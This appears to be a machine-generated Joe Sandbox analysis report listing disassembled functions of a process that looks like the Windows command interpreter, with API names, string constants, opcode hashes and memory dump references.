                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                          • Instruction ID: c1882c4700a1322671b282f50fe12c5dde7c16e2fbdf4df465b8c7255d198c96
                                                                                                          • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                          • Instruction Fuzzy Hash: D5F03131A1A742C6EB56AB19F840078FBA5FB89B48B9A9534D90E03374DF3CD446C720
                                                                                                          Function 00007FF7AB134C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: exit
                                                                                                          • String ID:
                                                                                                          • API String ID: 2483651598-0
                                                                                                          • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                          • Instruction ID: 711d67c70c35918abe37e95caa9d627fb629a1a11bf3a36ef0c6da3b14c018d3
                                                                                                          • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                          • Instruction Fuzzy Hash: 78C0803070564687EF5D7735B49107DD5546F08305F49543CC50B812B1FE2CD40C8210
                                                                                                          Function 00007FF7AB135508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DefaultUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 3358694519-0
                                                                                                          • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                          • Instruction ID: 1ecfa4c4f8078bdcf456729ab60d1787b048c8a134dfa46937d2af47e7b89959
                                                                                                          • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                          • Instruction Fuzzy Hash: 4FE0C2F2E0A2538AF5DE3A49F0893B89953DB6AF8AFC64031C60D122F16D2D38455228
                                                                                                          Function 00007FF7AB132E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2221118986-0
                                                                                                          • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                          • Instruction ID: 795868105bf6d58b7335481bda7b5d96b348a82e119f48b0c6f2684bb872796d
                                                                                                          • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                          • Instruction Fuzzy Hash: 54F0B421B0A78140EA99A75AF541129A2909B88BE4B888330EA7D47BF9EE3CD4518700

                                                                                                          Non-executed Functions

                                                                                                          Function 00007FF7AB125B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                                          • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                                          • API String ID: 1388555566-2647954630
                                                                                                          • Opcode ID: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                                          • Instruction ID: 0d054a20ad1adc71f6f5a1606306d2d75f352b11923167fc3afa241d0b1f19ed
                                                                                                          • Opcode Fuzzy Hash: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                                          • Instruction Fuzzy Hash: D6A2A571A0A78286E716AB29F4541B9F7A1FB89788FC28235DA4E477B4EF3CD504C710
                                                                                                          Function 00007FF7AB12E680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                                          • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                                          • API String ID: 511550188-726566285
                                                                                                          • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                          • Instruction ID: 4d092aa1b6d767452928d62addd36d78165f43845b3b0fa0b32b9c6aa18d1318
                                                                                                          • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                          • Instruction Fuzzy Hash: AF52D232A0E652C6EB66AB1CF410679EAA4FB49748FC64135D94E437B4EF3CE845C720
                                                                                                          Function 00007FF7AB129E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmp$wcschr$wcstol
                                                                                                          • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                                          • API String ID: 1738779099-3004636944
                                                                                                          • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                          • Instruction ID: 673450ea1e185ad88fe3df3a836e3ae85d7e2da640e2822efdffd122f525369c
                                                                                                          • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                          • Instruction Fuzzy Hash: F8728031B1A682CAEB56AF69F4502BDB7A1FB4474CF824135CE0D577B4EE3CA8058760
                                                                                                          Function 00007FF7AB147F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB147F44
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB147F5C
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB147F9E
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB147FFF
                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148020
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148036
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148061
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB148075
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB1480D6
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB1480EA
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB148177
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB14819A
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB1481BD
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB1481DC
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB1481FB
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB14821A
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB148239
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148291
                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB1482D7
                                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB1482FB
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB14831A
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148364
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB148378
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB14839A
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB1483AE
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB1483E6
                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148403
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148418
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                          • API String ID: 3637805771-3100821235
                                                                                                          • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                          • Instruction ID: 287801347771346a5fc7ee7d88d3821e82213889c73c62665a8f6e6c3bbff494
                                                                                                          • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                          • Instruction Fuzzy Hash: 1BE1B571A066528AE712AF2DF440179FAA1FB49B98B868231DD1F437B0EF3CA445C720
                                                                                                          Function 00007FF7AB123F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                                          • String ID: %s$%s
                                                                                                          • API String ID: 3623545644-3518022669
                                                                                                          • Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                          • Instruction ID: b2e334b2d83c723a66aee445f62794649b25a417e846f38fb935ffe5b2525e22
                                                                                                          • Opcode Fuzzy Hash: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                          • Instruction Fuzzy Hash: 3ED2B471B0A682CAEB66AB29F4502B9F7A1FB4574CF914135DA0E47AB4EF3CE444C710
                                                                                                          Function 00007FF7AB122C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                                          • String ID: %9d$%s
                                                                                                          • API String ID: 4286035211-3662383364
                                                                                                          • Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                                          • Instruction ID: 120485d2136d955039f1c6d2b3f2ad2949236f8c05bf584ab10e3d34772b9225
                                                                                                          • Opcode Fuzzy Hash: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                                          • Instruction Fuzzy Hash: 0B52C572A0AB82CAEB66AB29F8542F9B7A0FB4574CF814131DA0E477B4DF3CD5458710
                                                                                                          Function 00007FF7AB1318D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcsrchr$towlower
                                                                                                          • String ID: fdpnxsatz
                                                                                                          • API String ID: 3267374428-1106894203
                                                                                                          • Opcode ID: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                                          • Instruction ID: 9b29f103170775d698819813b05886eb9d20eb500a4e23295a03f4d736e6631c
                                                                                                          • Opcode Fuzzy Hash: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                                          • Instruction Fuzzy Hash: 0942FA21B0A68285EB9AAF19F4402B9B7A1FF45B98F854535DE0E077F4EF3CD4598310
                                                                                                          Function 00007FF7AB127650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                          • String ID: DPATH
                                                                                                          • API String ID: 95024817-2010427443
                                                                                                          • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                          • Instruction ID: a4016625585cb64260c5981a51fdb2e86e1d754b59b57f10fa97cb4649736762
                                                                                                          • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                          • Instruction Fuzzy Hash: 0512D672A0A68286E766AF19F440179F7A1FB89758F865235EA4F437B4EF3CD400CB10
                                                                                                          Function 00007FF7AB125240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: [...]$ [..]$ [.]$...$:
                                                                                                          • API String ID: 0-1980097535
                                                                                                          • Opcode ID: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                                          • Instruction ID: 2148267d59feabd8b1a359a197032ad8684a029fceea51e2146f0ecf7ef750af
                                                                                                          • Opcode Fuzzy Hash: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                                          • Instruction Fuzzy Hash: C832A0B1A1A682C6EB22EB69F4402F9B3A0FB4578CF824131DA1D476B5EF3CD545C760
                                                                                                          Function 00007FF7AB126EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
